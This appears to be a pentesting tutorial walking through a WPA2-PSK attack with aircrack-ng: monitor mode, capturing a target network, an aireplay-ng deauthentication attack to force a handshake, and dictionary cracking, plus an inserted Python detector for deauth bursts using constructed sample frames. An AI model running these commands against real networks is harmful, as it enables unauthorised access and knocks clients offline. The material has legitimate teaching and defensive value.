WPA2 PSK

Hacking process

  1. Place wireless card into monitor mode
  2. Discover information about the network (channel & BSSID)
  3. Select network and capture data
  4. Perform deauth attack
  5. Capture WPA handshake
  6. Attempt to crack the handshake

Exploit walkthrough

Monitor mode

iwconfig                       # list wireless interfaces and their current mode
airmon-ng check kill           # stop processes (NetworkManager, wpa_supplicant) that would interfere
airmon-ng start wlan0          # start monitor mode; the interface is usually renamed wlan0mon
iwconfig                       # verify that the interface now reports Mode:Monitor

Discover information

airodump-ng wlan0mon           # use the monitor-mode interface name shown by iwconfig

# BSSID is the MAC address of the access point
# PWR is the signal level in dBm; the closer the number is to zero, the closer we are to the device
# CH is the channel
# ENC is the encryption type (here WPA2)
# ESSID is the name of the network; if it is hidden, only its length is shown

Select network and capture data

airodump-ng -c 6 --bssid <BSSID> -w capture wlan0mon
# -c       channel of the target network
# --bssid  MAC address of the target router
# -w       filename prefix for the capture files

After that we will see the devices attached to the network.

Then, to capture the handshake, we can either wait for a client to (re)connect or, to speed the process up, kick a connected client off the network so that it has to reauthenticate.

Perform deauth attack

# Open a new tab (leave airodump-ng running in the first one)
aireplay-ng -0 1 -a <BSSID> -c <client_mac_address> wlan0mon
# -0 selects the deauthentication attack, 1 = number of deauth rounds to send
# -a  BSSID of the access point, -c MAC address of the connected client
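The deauthentication frames that aireplay-ng sends are exactly what a wireless IDS watches for. The detector below is an added example, not code from the original page: it parses the 802.11 management header of each raw frame in pure Python and alerts when one BSSID sends a burst of deauth/disassoc frames to one client within a short window. All frames, MAC addresses, timestamps and the threshold are constructed sample input (assumptions, not values from the page).

```python
import struct
MGMT = 0                                # 802.11 frame type 0 = management
DEAUTH, DISASSOC, BEACON = 12, 10, 8    # management subtypes (frame-control bits 4-7)

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt_frame(frame: bytes) -> dict:
    """Parse the 24-byte 802.11 MAC header: frame control, duration, addr1-3, seq."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0 = frame[0]
    info = {"type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4, "da": mac(frame[4:10]),
            "sa": mac(frame[10:16]), "bssid": mac(frame[16:22])}
    if info["type"] == MGMT and info["subtype"] in (DEAUTH, DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]   # little-endian reason code
    return info

def build_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Minimal management frame layout; used here only to construct offline sample input."""
    fc0 = (subtype << 4) | (MGMT << 2)
    return bytes([fc0, 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body

def detect_deauth_bursts(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_frame). Alert when one
    (bssid, target) pair sees >= threshold deauth/disassoc frames within `window` seconds."""
    per_pair = {}
    for ts, raw in frames:
        f = parse_mgmt_frame(raw)
        if f["type"] == MGMT and f["subtype"] in (DEAUTH, DISASSOC):
            per_pair.setdefault((f["bssid"], f["da"]), []).append(ts)
    alerts = []
    for (bssid, da), stamps in per_pair.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):           # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"bssid": bssid, "target": da, "count": peak})
    return alerts

# Constructed sample: one AP, two clients, two beacons, an 8-frame deauth burst at client A,
# and a single deauth to client B (a normal session teardown, which must not alert).
AP, CLIENT_A, CLIENT_B = (bytes.fromhex(h) for h in ("aabbccddeeff", "112233445566", "778899aabbcc"))
REASON_7 = struct.pack("<H", 7)             # reason 7: class 3 frame from non-associated STA
SAMPLE_FRAMES = [(0.0, build_frame(BEACON, b"\xff" * 6, AP, AP)), (0.1, build_frame(BEACON, b"\xff" * 6, AP, AP))]
SAMPLE_FRAMES += [(10.0 + i * 0.05, build_frame(DEAUTH, CLIENT_A, AP, AP, REASON_7)) for i in range(8)]
SAMPLE_FRAMES.append((50.0, build_frame(DEAUTH, CLIENT_B, AP, AP, struct.pack("<H", 3))))
```

On a real capture the raw frames would come from a monitor-mode pcap (after stripping the radiotap header) and the timestamps from the pcap record headers.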

Capture WPA handshake

Once the deauth process starts, the WPA handshake should pop up in the airodump-ng tab. Look at the capture file written by airodump-ng (capture.cap).

Attempt to crack the handshake

aircrack-ng -w <wordlist.txt> -b <BSSID> capture.cap
# -w  wordlist to try, -b BSSID of the target network
# airodump-ng numbers its output files, so the capture is usually named capture-01.cap

Last updated 4 years ago
